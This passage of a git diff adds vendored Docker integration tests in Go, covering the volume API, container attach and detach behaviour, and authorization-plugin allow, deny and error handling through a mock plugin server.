c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) + + v := volumes.Volumes[0] + status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use")) + + dockerCmd(c, "rm", "-f", "test") + status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data))) + +} + +func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) { + config := volumetypes.VolumesCreateBody{ + Name: "test", + } + status, b, err := sockRequest("POST", "/volumes/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) + + status, b, err = sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) + + var volumes volumetypes.VolumesListOKBody + c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) + + var vol types.Volume + status, b, err = sockRequest("GET", "/volumes/"+config.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) + c.Assert(json.Unmarshal(b, &vol), checker.IsNil) + c.Assert(vol.Name, checker.Equals, config.Name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go new file mode 100644 index 0000000000..2df4fdc4d2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go @@ -0,0 +1,168 @@ +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "runtime" + 
"strings" + "sync" + "time" + + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +const attachWait = 5 * time.Second + +func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { + endGroup := &sync.WaitGroup{} + startGroup := &sync.WaitGroup{} + endGroup.Add(3) + startGroup.Add(3) + + err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") + c.Assert(err, check.IsNil) + + startDone := make(chan struct{}) + endDone := make(chan struct{}) + + go func() { + endGroup.Wait() + close(endDone) + }() + + go func() { + startGroup.Wait() + close(startDone) + }() + + for i := 0; i < 3; i++ { + go func() { + cmd := exec.Command(dockerBinary, "attach", "attacher") + + defer func() { + cmd.Wait() + endGroup.Done() + }() + + out, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + defer out.Close() + + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + + buf := make([]byte, 1024) + + if _, err := out.Read(buf); err != nil && err != io.EOF { + c.Fatal(err) + } + + startGroup.Done() + + if !strings.Contains(string(buf), "hello") { + c.Fatalf("unexpected output %s expected hello\n", string(buf)) + } + }() + } + + select { + case <-startDone: + case <-time.After(attachWait): + c.Fatalf("Attaches did not initialize properly") + } + + dockerCmd(c, "kill", "attacher") + + select { + case <-endDone: + case <-time.After(attachWait): + c.Fatalf("Attaches did not finish properly") + } +} + +func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + done := make(chan error) + go func() { + defer close(done) + + cmd := exec.Command(dockerBinary, "attach", id) + if _, err := cmd.StdinPipe(); err != nil { + done <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". 
If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + done <- fmt.Errorf("attach should have failed") + return + } else if !strings.Contains(out, expected) { + done <- fmt.Errorf("attach failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-done: + c.Assert(err, check.IsNil) + case <-time.After(attachWait): + c.Fatal("attach is running but should have failed") + } +} + +func (s *DockerSuite) TestAttachDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-di", "busybox", "/bin/cat") + id := strings.TrimSpace(out) + + cmd := exec.Command(dockerBinary, "attach", id) + stdin, err := cmd.StdinPipe() + if err != nil { + c.Fatal(err) + } + defer stdin.Close() + stdout, err := cmd.StdoutPipe() + c.Assert(err, check.IsNil) + defer stdout.Close() + c.Assert(cmd.Start(), check.IsNil) + defer cmd.Process.Kill() + + _, err = stdin.Write([]byte("hello\n")) + c.Assert(err, check.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + + c.Assert(stdin.Close(), check.IsNil) + + // Expect container to still be running after stdin is closed + running := inspectField(c, id, "State.Running") + c.Assert(running, check.Equals, "true") +} + +func (s *DockerSuite) TestAttachPausedContainer(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + runSleepingContainer(c, "-d", "--name=test") + dockerCmd(c, "pause", "test") + + result := dockerCmdWithResult("attach", "test") + c.Assert(result, icmd.Matches, icmd.Expected{ + Error: "exit status 1", + ExitCode: 1, + Err: "You cannot attach to a paused container, unpause it first", + }) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go new file mode 
100644 index 0000000000..fb794ccc40 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go @@ -0,0 +1,237 @@ +// +build !windows + +package main + +import ( + "bufio" + "io/ioutil" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #9860 Make sure attach ends when container ends (with no errors) +func (s *DockerSuite) TestAttachClosedOnContainerStop(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-dti", "busybox", "/bin/sh", "-c", `trap 'exit 0' SIGTERM; while true; do sleep 1; done`) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + + attachCmd := exec.Command(dockerBinary, "attach", id) + attachCmd.Stdin = tty + attachCmd.Stdout = tty + attachCmd.Stderr = tty + err = attachCmd.Start() + c.Assert(err, check.IsNil) + + errChan := make(chan error) + go func() { + time.Sleep(300 * time.Millisecond) + defer close(errChan) + // Container is waiting for us to signal it to stop + dockerCmd(c, "stop", id) + // And wait for the attach command to end + errChan <- attachCmd.Wait() + }() + + // Wait for the docker to end (should be done by the + // stop command in the go routine) + dockerCmd(c, "wait", id) + + select { + case err := <-errChan: + tty.Close() + out, _ := ioutil.ReadAll(pty) + c.Assert(err, check.IsNil, check.Commentf("out: %v", string(out))) + case <-time.After(attachWait): + c.Fatal("timed out without attach returning") + } + +} + +func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { + name := "detachtest" + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err)) + cmd := exec.Command(dockerBinary, "run", "-ti", "--name", name, "busybox") + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + + errChan 
:= make(chan error) + go func() { + errChan <- cmd.Run() + close(errChan) + }() + + c.Assert(waitRun(name), check.IsNil) + + cpty.Write([]byte{16}) + time.Sleep(100 * time.Millisecond) + cpty.Write([]byte{17}) + + select { + case err := <-errChan: + if err != nil { + buff := make([]byte, 200) + tty.Read(buff) + c.Fatalf("%s: %s", err, buff) + } + case <-time.After(5 * time.Second): + c.Fatal("timeout while detaching") + } + + cpty, tty, err = pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err)) + + cmd = exec.Command(dockerBinary, "attach", name) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + + err = cmd.Start() + c.Assert(err, checker.IsNil) + + bytes := make([]byte, 10) + var nBytes int + readErr := make(chan error, 1) + + go func() { + time.Sleep(500 * time.Millisecond) + cpty.Write([]byte("\n")) + time.Sleep(500 * time.Millisecond) + + nBytes, err = cpty.Read(bytes) + cpty.Close() + readErr <- err + }() + + select { + case err := <-readErr: + c.Assert(err, check.IsNil) + case <-time.After(2 * time.Second): + c.Fatal("timeout waiting for attach read") + } + + err = cmd.Wait() + c.Assert(err, checker.IsNil) + + c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #") + +} + +// TestAttachDetach checks that attach in tty mode can be detached using the long container ID +func (s *DockerSuite) TestAttachDetach(c *check.C) { + out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + cpty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + stdout, err := cmd.StdoutPipe() + c.Assert(err, check.IsNil) + defer stdout.Close() + err = cmd.Start() + c.Assert(err, check.IsNil) + c.Assert(waitRun(id), check.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, check.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, check.IsNil) 
+ c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out)) + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + running := inspectField(c, id, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) + + go func() { + dockerCmd(c, "kill", id) + }() + + select { + case <-ch: + case <-time.After(10 * time.Millisecond): + c.Fatal("timed out waiting for container to exit") + } + +} + +// TestAttachDetachTruncatedID checks that attach in tty mode can be detached +func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) { + out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat") + id := stringid.TruncateID(strings.TrimSpace(out)) + c.Assert(waitRun(id), check.IsNil) + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + defer stdout.Close() + err = cmd.Start() + c.Assert(err, checker.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out)) + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + running := inspectField(c, id, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) + 
+ go func() { + dockerCmd(c, "kill", id) + }() + + select { + case <-ch: + case <-time.After(10 * time.Millisecond): + c.Fatal("timed out waiting for container to exit") + } + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go new file mode 100644 index 0000000000..8a669fb379 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go @@ -0,0 +1,133 @@ +// +build !windows + +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var ( + authzPluginName = "riyaz/authz-no-volume-plugin" + authzPluginTag = "latest" + authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag + authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" + nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" +) + +func init() { + check.Suite(&DockerAuthzV2Suite{ + ds: &DockerSuite{}, + }) +} + +type DockerAuthzV2Suite struct { + ds *DockerSuite + d *Daemon +} + +func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + s.d = NewDaemon(c) + c.Assert(s.d.Start(), check.IsNil) +} + +func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + // start the daemon with the plugin and load busybox, --net=none build fails otherwise + // because it needs to pull busybox + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) + c.Assert(s.d.LoadBusybox(), check.IsNil) + + // defer disabling the plugin + defer func() { + c.Assert(s.d.Restart(), 
check.IsNil) + _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + }() + + // Ensure docker run command and accompanying docker ps are successful + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("ps") + c.Assert(err, check.IsNil) + c.Assert(assertContainerList(out, []string{id}), check.Equals, true) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + + // restart the daemon with the plugin + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) + + // defer disabling the plugin + defer func() { + c.Assert(s.d.Restart(), check.IsNil) + _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + }() + + out, err := s.d.Cmd("volume", "create") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "ls") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + // The plugin will block the command before it can determine the volume does not exist + out, err = s.d.Cmd("volume", "rm", "test") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, 
check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "prune", "-f") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin with bad manifest + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginBadManifestName) + c.Assert(err, checker.IsNil) + + // start the daemon with the plugin, it will error + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil) + + // restarting the daemon without requiring the plugin will succeed + c.Assert(s.d.Restart(), check.IsNil) +} + +func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + // start the daemon with a non-existent authz plugin, it will error + c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil) + + // restarting the daemon without requiring the plugin will succeed + c.Assert(s.d.Restart(), check.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go new file mode 100644 index 0000000000..a826249e2e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go @@ -0,0 +1,477 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + + "bufio" + "bytes" + "os/exec" + "strconv" + "time" + + "net" + "net/http/httputil" + "net/url" + + "github.com/docker/docker/pkg/authorization" + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/plugins" + "github.com/go-check/check" +) + +const ( + testAuthZPlugin = "authzplugin" + unauthorizedMessage = "User unauthorized authz plugin" + errorMessage = "something went wrong..." + containerListAPI = "/containers/json" +) + +var ( + alwaysAllowed = []string{"/_ping", "/info"} +) + +func init() { + check.Suite(&DockerAuthzSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerAuthzSuite struct { + server *httptest.Server + ds *DockerSuite + d *Daemon + ctrl *authorizationController +} + +type authorizationController struct { + reqRes authorization.Response // reqRes holds the plugin response to the initial client request + resRes authorization.Response // resRes holds the plugin response to the daemon response + psRequestCnt int // psRequestCnt counts the number of calls to list container request api + psResponseCnt int // psResponseCnt counts the number of calls to list containers response API + requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller + reqUser string + resUser string +} + +func (s *DockerAuthzSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) + s.ctrl = &authorizationController{} +} + +func (s *DockerAuthzSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) + s.ctrl = nil +} + +func (s *DockerAuthzSuite) SetUpSuite(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) + c.Assert(err, check.IsNil) + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + c.Assert(err, check.IsNil) + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + c.Assert(err, 
check.IsNil) + + assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) + assertAuthHeaders(c, authReq.RequestHeaders) + + // Count only container list api + if strings.HasSuffix(authReq.RequestURI, containerListAPI) { + s.ctrl.psRequestCnt++ + } + + s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI) + + reqRes := s.ctrl.reqRes + if isAllowed(authReq.RequestURI) { + reqRes = authorization.Response{Allow: true} + } + if reqRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(reqRes) + c.Assert(err, check.IsNil) + s.ctrl.reqUser = authReq.User + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + c.Assert(err, check.IsNil) + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + c.Assert(err, check.IsNil) + + assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) + assertAuthHeaders(c, authReq.ResponseHeaders) + + // Count only container list api + if strings.HasSuffix(authReq.RequestURI, containerListAPI) { + s.ctrl.psResponseCnt++ + } + resRes := s.ctrl.resRes + if isAllowed(authReq.RequestURI) { + resRes = authorization.Response{Allow: true} + } + if resRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(resRes) + c.Assert(err, check.IsNil) + s.ctrl.resUser = authReq.User + w.Write(b) + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) + err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644) + c.Assert(err, checker.IsNil) +} + +// check for always allowed endpoints to not inhibit test framework functions +func isAllowed(reqURI string) bool { + for _, endpoint := range alwaysAllowed { + if strings.HasSuffix(reqURI, endpoint) { + return true + } + } + return false +} 
+ +// assertAuthHeaders validates authentication headers are removed +func assertAuthHeaders(c *check.C, headers map[string]string) error { + for k := range headers { + if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { + c.Errorf("Found authentication headers in request '%v'", headers) + } + } + return nil +} + +// assertBody asserts that body is removed for non text/json requests +func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) { + if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { + //return fmt.Errorf("Body included for authentication endpoint %s", string(body)) + c.Errorf("Body included for authentication endpoint %s", string(body)) + } + + for k, v := range headers { + if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { + return + } + } + if len(body) > 0 { + c.Errorf("Body included while it should not (Headers: '%v')", headers) + } +} + +func (s *DockerAuthzSuite) TearDownSuite(c *check.C) { + if s.server == nil { + return + } + + s.server.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) { + // start the daemon and load busybox, --net=none build fails otherwise + // cause it needs to pull busybox + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + // Ensure command successful + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + id := strings.TrimSpace(out) + assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") + assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id)) + + out, err = s.d.Cmd("ps") + c.Assert(err, check.IsNil) + c.Assert(assertContainerList(out, []string{id}), check.Equals, 
true) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) +} + +func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) { + + const testDaemonHTTPSAddr = "tcp://localhost:4271" + // start the daemon and load busybox, --net=none build fails otherwise + // cause it needs to pull busybox + if err := s.d.Start( + "--authorization-plugin="+testAuthZPlugin, + "--tlsverify", + "--tlscacert", + "fixtures/https/ca.pem", + "--tlscert", + "fixtures/https/server-cert.pem", + "--tlskey", + "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + + out, _ := dockerCmd( + c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "-H", + testDaemonHTTPSAddr, + "version", + ) + if !strings.Contains(out, "Server") { + c.Fatalf("docker version should return information of server side") + } + + c.Assert(s.ctrl.reqUser, check.Equals, "client") + c.Assert(s.ctrl.resUser, check.Equals, "client") +} + +func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = false + s.ctrl.reqRes.Msg = unauthorizedMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 0) + + // Ensure unauthorized message appears in response + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) +} + +// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden +func (s *DockerAuthzSuite) 
TestAuthZPluginAPIDenyResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = false + s.ctrl.resRes.Msg = unauthorizedMessage + + daemonURL, err := url.Parse(s.d.sock()) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + c.Assert(err, check.IsNil) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + c.Assert(err, check.IsNil) + resp, err := client.Do(req) + + c.Assert(err, check.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden) + c.Assert(err, checker.IsNil) +} + +func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = false + s.ctrl.resRes.Msg = unauthorizedMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) + + // Ensure unauthorized message appears in response + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) +} + +// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin +func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) { + testRequires(c, DaemonIsLinux) + + // start the daemon and load busybox to avoid pulling busybox from Docker Hub + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + startTime := strconv.FormatInt(daemonTime(c).Unix(), 10) + // Add another command to to enable event pipelining + eventsCmd := exec.Command(dockerBinary, "--host", 
s.d.sock(), "events", "--since", startTime) + stdout, err := eventsCmd.StdoutPipe() + if err != nil { + c.Assert(err, check.IsNil) + } + + observer := eventObserver{ + buffer: new(bytes.Buffer), + command: eventsCmd, + scanner: bufio.NewScanner(stdout), + startTime: startTime, + } + + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + // Create a container and wait for the creation events + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + containerID := strings.TrimSpace(out) + c.Assert(s.d.waitRun(containerID), checker.IsNil) + + events := map[string]chan bool{ + "create": make(chan bool, 1), + "start": make(chan bool, 1), + } + + matcher := matchEventLine(containerID, "container", events) + processor := processEventMatch(events) + go observer.Match(matcher, processor) + + // Ensure all events are received + for event, eventChannel := range events { + + select { + case <-time.After(30 * time.Second): + // Fail the test + observer.CheckEventError(c, containerID, event, matcher) + c.FailNow() + case <-eventChannel: + // Ignore, event received + } + } + + // Ensure both events and container endpoints are passed to the authorization plugin + assertURIRecorded(c, s.ctrl.requestsURIs, "/events") + assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") + assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Err = errorMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage)) +} + +func (s *DockerAuthzSuite) 
TestAuthZPluginErrorRequest(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Err = errorMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) { + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) + + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + + out, err := s.d.Cmd("ps") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // assert plugin is only called once.. + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) +} + +func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) { + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + tmp, err := ioutil.TempDir("", "test-authz-load-import") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmp) + + savedImagePath := filepath.Join(tmp, "save.tar") + + out, err := 